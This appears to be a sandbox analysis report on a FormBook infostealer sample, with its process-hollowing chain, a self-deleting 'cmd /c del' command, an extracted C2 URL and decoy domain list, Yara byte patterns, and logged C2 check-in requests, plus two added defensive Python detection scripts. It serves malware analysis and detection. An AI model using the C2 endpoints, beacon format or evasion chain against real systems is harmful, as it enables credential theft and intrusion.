Analysis Report TazxfJHRhq.exe

Overview

General Information

Sample Name: TazxfJHRhq.exe
Analysis ID: 383852
MD5: f818665dd48a93c48255d3ceadf92a6e
SHA1: 2567c8a3e1a3e3e98782ea8d0d117518ccd4291b
SHA256: 6bb8fa14bf9c650a67541ffedff2e3f1c055454b90489653c95aa39284d7eb92
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • TazxfJHRhq.exe (PID: 4736 cmdline: 'C:\Users\user\Desktop\TazxfJHRhq.exe' MD5: F818665DD48A93C48255D3CEADF92A6E)
    • TazxfJHRhq.exe (PID: 5940 cmdline: 'C:\Users\user\Desktop\TazxfJHRhq.exe' MD5: F818665DD48A93C48255D3CEADF92A6E)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmstp.exe (PID: 4064 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
          • cmd.exe (PID: 5948 cmdline: /c del 'C:\Users\user\Desktop\TazxfJHRhq.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
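
The tree above is the whole FormBook chain in six events: the sample relaunches a copy of itself (the suspended-process hollowing step), the hollowed copy injects into explorer.exe, explorer.exe starts cmstp.exe with a bare command line, and cmstp.exe runs cmd.exe to delete the original dropper. The script below is an added example, not Joe Sandbox code: it encodes those three relationships as checks over Sysmon-style process-creation events. The events are constructed from the tree (PIDs, images and command lines as listed; parent links follow the tree, which draws injected processes as children of the injector, so explorer.exe's real parent is not represented). The image paths for explorer.exe and cmd.exe, the parent of PID 4736, the LOLBINS set beyond cmstp.exe, and the severities are assumptions.

```python
"""Flag the FormBook execution chain in Sysmon-style process-creation events.

Added example for this report, not Joe Sandbox code. EVENTS is constructed
from the process tree in the report; see the comments for what is assumed.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass
class ProcEvent:
    """The Sysmon Event ID 1 fields the checks need."""
    pid: int
    ppid: int
    image: str
    cmdline: str


EVENTS: List[ProcEvent] = [
    ProcEvent(4736, 0, r"C:\Users\user\Desktop\TazxfJHRhq.exe",          # parent not in report
              r"'C:\Users\user\Desktop\TazxfJHRhq.exe'"),
    ProcEvent(5940, 4736, r"C:\Users\user\Desktop\TazxfJHRhq.exe",
              r"'C:\Users\user\Desktop\TazxfJHRhq.exe'"),
    ProcEvent(3388, 5940, r"C:\Windows\explorer.exe", ""),                # path assumed
    ProcEvent(4064, 3388, r"C:\Windows\SysWOW64\cmstp.exe",
              r"C:\Windows\SysWOW64\cmstp.exe"),
    ProcEvent(5948, 4064, r"C:\Windows\SysWOW64\cmd.exe",                 # path assumed
              r"/c del 'C:\Users\user\Desktop\TazxfJHRhq.exe'"),
    ProcEvent(5320, 5948, r"C:\Windows\system32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

# cmstp.exe is the binary hollowed in this run; the others are an assumed
# extension with similar "should not be started by explorer.exe with no
# arguments" semantics.
LOLBINS = {"cmstp.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe",
           "msiexec.exe", "wscript.exe", "cscript.exe", "certutil.exe"}
USER_WRITABLE = re.compile(r"^[a-z]:\\users\\[^\\]+\\(desktop|downloads|appdata)\\", re.I)
SELF_DELETE = re.compile(r"/c\s+del\s+['\"]?(?P<path>[^'\"]+?\.exe)['\"]?", re.I)

Finding = Tuple[str, int, str]  # (severity, pid, description)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def analyse(events: List[ProcEvent]) -> List[Finding]:
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    images_seen = {e.image.lower() for e in events}
    findings: List[Finding] = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent is None:
            continue
        name, pname = basename(e.image), basename(parent.image)
        # 1. A binary in a user-writable directory starts a second copy of
        #    itself: the "creates a process in suspended mode" hollowing step.
        if parent.image.lower() == e.image.lower() and USER_WRITABLE.match(e.image):
            findings.append(("medium", e.pid, f"self-spawn from user-writable path: {e.image}"))
        # 2. explorer.exe starts a LOLBin with a bare command line. A genuine
        #    cmstp.exe launch carries an .inf path and switches.
        if pname == "explorer.exe" and name in LOLBINS:
            args = e.cmdline.strip().strip("'\"")
            if args == "" or args.lower() == e.image.lower():
                findings.append(("high", e.pid, f"explorer.exe launched {name} with no arguments"))
        # 3. A LOLBin spawns cmd.exe to delete an .exe. If that .exe is the
        #    image of a process in the same log, the dropper is erasing itself.
        if pname in LOLBINS and name == "cmd.exe":
            m = SELF_DELETE.search(e.cmdline)
            if m:
                target = m.group("path")
                sev = "critical" if target.lower() in images_seen else "high"
                findings.append((sev, e.pid, f"{pname} spawned cmd.exe to delete {target}"))
    return findings


if __name__ == "__main__":
    for sev, pid, what in analyse(EVENTS):
        print(f"[{sev}] pid {pid}: {what}")
```

Check 3 is the one worth alerting on by itself: a signed system binary that never legitimately deletes user files is the parent of a cmd /c del whose target is an executable the log has already seen running. Check 1 alone is noisy (installers and browsers also respawn themselves), which is why it is only scored medium and gains weight from the other two.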

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.autotrafficbot.com/evpn/"], "decoy": ["memoriesmade-l.com", "babypowah.com", "usinggroovefunnels.com", "qapjv.com", "kp031.com", "kinfet.com", "markmalls.com", "keithforemandesigns.com", "fydia.com", "jesussaysalllivesmatter.com", "sarachavesportela.com", "standerup.com", "monthlywifi.com", "productsoffholland.com", "newbieadvice.com", "globalnetworkautomation.com", "theholisticbirthco.com", "physicalrobot.com", "thesouthernhomesellers.com", "teamcounteract.com", "icomplementi.com", "jsmsheetmetal.com", "jcernadas.com", "del-tekzen.com", "alekseeva-center.info", "arunkapur.com", "gregismyrealestateagent.com", "soalfintech.com", "notrecondourbania.com", "alum2alum.network", "gototaku.com", "moneymakeideas.com", "dbdcontractlngllc.com", "tor-one.com", "walgreenlitigation.com", "votestephaniezarb.com", "washathome.club", "zhuledao.com", "sonyjewls.com", "oncologyacademe.com", "kuppers.info", "cgpizza.net", "glgshopbd.com", "dodson4tulare.com", "mishtifarmers.com", "a1-2c.com", "oligan-gs.com", "countrysidehomeinvestors.com", "bpro.swiss", "fodiyo.com", "playelementsgame.com", "melhorquesantander.com", "jamessicilia.com", "abundancewithmelissaharvey.com", "vatandoost.com", "curiosityisthecurebook.com", "o8y8.com", "de-knutselkeet.com", "advisorsonecall.com", "homerangeopen.com", "brusselsdesignproject.com", "0449888.com", "psychicsjaneholden.com", "b-sphere.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166b9:$sqlite3step: 68 34 1C 7B E1
  • 0x167cc:$sqlite3step: 68 34 1C 7B E1
  • 0x166e8:$sqlite3text: 68 38 2A 90 C5
  • 0x1680d:$sqlite3text: 68 38 2A 90 C5
  • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
19 further memory-dump matches are not shown in this export.

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166b9:$sqlite3step: 68 34 1C 7B E1
  • 0x167cc:$sqlite3step: 68 34 1C 7B E1
  • 0x166e8:$sqlite3text: 68 38 2A 90 C5
  • 0x1680d:$sqlite3text: 68 38 2A 90 C5
  • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
1.2.TazxfJHRhq.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.TazxfJHRhq.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
13 further entries are not shown in this export.
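
The byte sequences in the two tables can be re-checked on any dump without yara installed, and two of the pattern families are readable on sight: $sequence_0 contains 0F 31 (rdtsc) bracketed by add/sub on the timestamp, which is the timing check behind "Tries to detect virtualization through RDTSC time measurements", and the three JPCERT strings are each a single push imm32 (opcode 68), whose constants the rule names as the sqlite3_step / column_text / column_blob lookups, i.e. hashed API names rather than plaintext imports, which is why they survive repacking. Note also that every sequence sits exactly 0xE00 lower in 1.2.TazxfJHRhq.exe.400000.0.unpack than in the raw dump: the offsets are file-versus-virtual, not different code. The script below is an added example, not Joe Sandbox code and not the published rules: the patterns are copied from the Strings columns, the two rule conditions are approximated with assumed thresholds (see verdict), the function names are mine, and the scanned buffer is constructed so it runs offline.

```python
"""Re-check the Yara string hits from the report's two tables without yara.

Added example, not Joe Sandbox code and not the published rules. The
patterns are copied from the report; verdict() uses assumed conditions;
build_sample() is a constructed buffer, not a real dump.
"""
from typing import Dict, List, Optional

# Patterns exactly as listed (Formbook_1 by yara-signator, Formbook by
# JPCERT/CC). Report offsets are relative to each dump.
SEQUENCES: Dict[str, str] = {
    "Formbook_1:$sequence_0": "03 C8 0F 31 2B C1 89 45 FC",
    "Formbook_1:$sequence_1": "3C 24 0F 84 76 FF FF FF 3C 25 74 94",
    "Formbook_1:$sequence_2": "3B 4F 14 73 95 85 C9 74 91",
    "Formbook_1:$sequence_3": "3C 69 75 44 8B 7D 18 8B 0F",
    "Formbook_1:$sequence_4": "5D C3 8D 50 7C 80 FA 07",
    "Formbook_1:$sequence_5": "0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06",
    "Formbook_1:$sequence_6": "57 89 45 FC 89 45 F4 89 45 F8",
    "Formbook_1:$sequence_7": "66 89 0C 02 5B 8B E5 5D",
    "Formbook_1:$sequence_8": "3C 54 74 04 3C 74 75 F4",
    "Formbook_1:$sequence_9": "56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00",
    "Formbook:$sqlite3step": "68 34 1C 7B E1",
    "Formbook:$sqlite3text": "68 38 2A 90 C5",
    "Formbook:$sqlite3blob": "68 53 D8 7F 8C",
}


def hexpat(text: str) -> bytes:
    """'03 C8 0F 31' -> b'\\x03\\xc8\\x0f\\x31'."""
    return bytes.fromhex(text.replace(" ", ""))


def scan(buf: bytes, sequences: Dict[str, str] = SEQUENCES) -> Dict[str, List[int]]:
    """Map each pattern name to every offset at which it occurs in buf."""
    hits: Dict[str, List[int]] = {}
    for name, text in sequences.items():
        pat = hexpat(text)
        offsets, pos = [], buf.find(pat)
        while pos != -1:
            offsets.append(pos)
            pos = buf.find(pat, pos + 1)
        if offsets:
            hits[name] = offsets
    return hits


def push_imm32(pattern: bytes) -> Optional[int]:
    """Decode a 5-byte `push imm32` (opcode 0x68) to its constant. The three
    JPCERT strings have this shape; the constants are the hashed API names
    the rule labels sqlite3step/text/blob."""
    if len(pattern) == 5 and pattern[0] == 0x68:
        return int.from_bytes(pattern[1:], "little")
    return None


def uses_rdtsc(pattern: bytes) -> bool:
    """0F 31 is RDTSC. $sequence_0 decodes to add ecx,eax / rdtsc /
    sub eax,ecx / mov [ebp-4],eax: a timestamp delta used as a VM check."""
    return b"\x0f\x31" in pattern


def verdict(hits: Dict[str, List[int]]) -> Dict[str, bool]:
    """Assumed conditions: 7 of the 10 yara-signator sequences (the usual
    '7 of them' in those generated rules) and all three JPCERT strings."""
    n_sig = sum(1 for n in hits if n.startswith("Formbook_1:"))
    n_jp = sum(1 for n in hits if n.startswith("Formbook:"))
    return {"Formbook_1": n_sig >= 7, "Formbook": n_jp == 3}


def build_sample() -> bytes:
    """Constructed buffer, not a real dump: arithmetic filler (consecutive
    bytes differ by 7, so no listed pattern occurs by accident) with every
    pattern planted at a known offset and $sequence_0 planted twice, as in
    the report's dumps."""
    buf = bytearray((i * 7 + 3) & 0xFF for i in range(0x2000))
    for i, text in enumerate(SEQUENCES.values()):
        pat = hexpat(text)
        off = 0x100 + i * 0x80
        buf[off:off + len(pat)] = pat
    first = hexpat(SEQUENCES["Formbook_1:$sequence_0"])
    buf[0x1000:0x1000 + len(first)] = first
    return bytes(buf)


if __name__ == "__main__":
    found = scan(build_sample())
    for name, offsets in found.items():
        print(f"{name}: {[hex(o) for o in offsets]}")
    print(verdict(found))
```

To run it against the report's artefacts, feed the raw bytes of a .sdmp or .unpack file to scan() and compare the returned offsets with the tables; the thresholds in verdict() are the only part that is not taken from the page.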

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://www.theholisticbirthco.com/evpn/?JDK8ix=x0ZJTajXylflf9w1AOLp4z6MEeP0j5bmDWx3E2oNmzw2lecwih58OZgaRC+Q9k1hI2JG&w4=jFNp36Ihu | Avira URL Cloud: Label: malware
Source: http://www.jcernadas.com/evpn/?JDK8ix=vuWMxfkh+6vmXF1oy+zIqCJtkAbujMYD9B0ur5oCOxuFSx86Hqk4MPW+e95bZxU45kLf&w4=jFNp36Ihu | Avira URL Cloud: Label: malware
Source: http://www.usinggroovefunnels.com/evpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytNF&w4=jFNp36Ihu | Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.autotrafficbot.com/evpn/"], "decoy": ["memoriesmade-l.com", "babypowah.com", "usinggroovefunnels.com", "qapjv.com", "kp031.com", "kinfet.com", "markmalls.com", "keithforemandesigns.com", "fydia.com", "jesussaysalllivesmatter.com", "sarachavesportela.com", "standerup.com", "monthlywifi.com", "productsoffholland.com", "newbieadvice.com", "globalnetworkautomation.com", "theholisticbirthco.com", "physicalrobot.com", "thesouthernhomesellers.com", "teamcounteract.com", "icomplementi.com", "jsmsheetmetal.com", "jcernadas.com", "del-tekzen.com", "alekseeva-center.info", "arunkapur.com", "gregismyrealestateagent.com", "soalfintech.com", "notrecondourbania.com", "alum2alum.network", "gototaku.com", "moneymakeideas.com", "dbdcontractlngllc.com", "tor-one.com", "walgreenlitigation.com", "votestephaniezarb.com", "washathome.club", "zhuledao.com", "sonyjewls.com", "oncologyacademe.com", "kuppers.info", "cgpizza.net", "glgshopbd.com", "dodson4tulare.com", "mishtifarmers.com", "a1-2c.com", "oligan-gs.com", "countrysidehomeinvestors.com", "bpro.swiss", "fodiyo.com", "playelementsgame.com", "melhorquesantander.com", "jamessicilia.com", "abundancewithmelissaharvey.com", "vatandoost.com", "curiosityisthecurebook.com", "o8y8.com", "de-knutselkeet.com", "advisorsonecall.com", "homerangeopen.com", "brusselsdesignproject.com", "0449888.com", "psychicsjaneholden.com", "b-sphere.com"]}
Multi AV Scanner detection for submitted file
Source: TazxfJHRhq.exe | Virustotal: Detection: 14%
Source: TazxfJHRhq.exe | ReversingLabs: Detection: 25%
Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.TazxfJHRhq.exe.27a0000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: 1.2.TazxfJHRhq.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.cmstp.exe.4af7960.5.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 1.1.TazxfJHRhq.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.TazxfJHRhq.exe.27a0000.4.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.cmstp.exe.6bd538.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: TazxfJHRhq.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: cmstp.pdbGCTL | source: TazxfJHRhq.exe, 00000001.00000002.248968735.0000000000629000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdbUGP | source: TazxfJHRhq.exe, 00000000.00000003.210529727.000000001EF00000.00000004.00000001.sdmp, TazxfJHRhq.exe, 00000001.00000002.249342255.0000000000B6F000.00000040.00000001.sdmp, cmstp.exe, 00000004.00000002.478158487.00000000045C0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: TazxfJHRhq.exe, cmstp.exe
Source: Binary string: cmstp.pdb | source: TazxfJHRhq.exe, 00000001.00000002.248968735.0000000000629000.00000004.00000020.sdmp
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA | 0_2_00405301
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose | 0_2_00405C94
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 0_2_004026BC FindFirstFileA | 0_2_004026BC
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 4x nop then pop ebx | 1_2_00406A9B
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 4x nop then pop edi | 1_2_004162B4
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 4x nop then pop ebx | 1_1_00406A9B
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 4x nop then pop edi | 1_1_004162B4
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4x nop then pop ebx | 4_2_00406A9B
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4x nop then pop edi | 4_2_004162B4

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49745 -> 192.185.48.194:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49745 -> 192.185.48.194:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49745 -> 192.185.48.194:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 52.58.78.16:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 52.58.78.16:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 52.58.78.16:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.autotrafficbot.com/evpn/
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=fhrZBjxaI0WDrOMMLB9i/eTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu HTTP/1.1 | Host: www.jamessicilia.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=tTQY57yJV1PB58vhZsfw1idcR39uzoBhuFhBLA0LfuUY3fYfkSmldauzSZkrcgPEdi+f&w4=jFNp36Ihu HTTP/1.1 | Host: www.kinfet.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=0M6ZQgL8IcDyCwomro3oU0+S4lgLLFgc0WEYasg9Je1ZokoU9qr9vbqVIYlP2JKTB372&w4=jFNp36Ihu HTTP/1.1 | Host: www.productsoffholland.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=KkWhScBkby78tLALzdAz8CnCjb47jVkq+/iIMgqrMbFUrtE+6VX7P3g+12tQT1WZakud&w4=jFNp36Ihu HTTP/1.1 | Host: www.markmalls.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=eugAyVbFjTGCbHTU5QCJaxOKGF+rVHXRgES2jcHdoUQlFxVgByKSQwjGascFDT08oG3Y&w4=jFNp36Ihu HTTP/1.1 | Host: www.zhuledao.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=vuWMxfkh+6vmXF1oy+zIqCJtkAbujMYD9B0ur5oCOxuFSx86Hqk4MPW+e95bZxU45kLf&w4=jFNp36Ihu HTTP/1.1 | Host: www.jcernadas.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=x0ZJTajXylflf9w1AOLp4z6MEeP0j5bmDWx3E2oNmzw2lecwih58OZgaRC+Q9k1hI2JG&w4=jFNp36Ihu HTTP/1.1 | Host: www.theholisticbirthco.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=MYo3qtR4MoTJM9eEEEQJY+2owLrirHbqorePLbwYxji+asNtirv2kfx8Flc200WiuFJj&w4=jFNp36Ihu HTTP/1.1 | Host: www.tor-one.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=SbzT885gMwI0SrecOCVR7+X63g3QiQnq4cO3Mq/wdHuk7Bui5+S2HJ4sI04qlEXUDlVA&w4=jFNp36Ihu HTTP/1.1 | Host: www.de-knutselkeet.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=rbKZoqFNxKUJa45rmf723j5e1+/Af1Vmd22uFdYYwCe+W7Lpy/kHCEK0lxAuMCiY39Cm&w4=jFNp36Ihu HTTP/1.1 | Host: www.autotrafficbot.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=lIAMQw8Bc5WvbtZzc5MVHUptsiPc1Sl8tBJqhUvlbuUAA7ypaYYvmQWduCHy/+CL3sQ0&w4=jFNp36Ihu HTTP/1.1 | Host: www.curiosityisthecurebook.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
